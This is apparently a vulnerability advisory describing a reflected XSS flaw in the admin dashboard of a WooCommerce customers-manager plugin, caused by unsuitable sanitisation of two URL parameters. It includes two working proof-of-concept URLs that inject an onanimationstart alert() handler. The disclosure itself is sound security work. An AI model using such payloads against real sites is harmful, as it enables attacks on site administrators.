The wccm_customers_ids and wccm_customers_emails parameters are output in href attributes, after being sanitised with the sanitize_text_field() function, which is not appropriate for such case, as payload such as ' injected-attribute=value will still be injected. This lead to a reflected XSS issue in the administrator dashboard when opening a malicious URL
https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-guests-list&wccm_customers_ids=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-ids%2F%29+b%3D%27 https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-guests-list&wccm_customers_emails=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS-emails%2F%29+b%3D%27
2021-03-30 (about 1 years ago)
2021-03-30 (about 1 years ago)
2021-04-09 (about 1 years ago)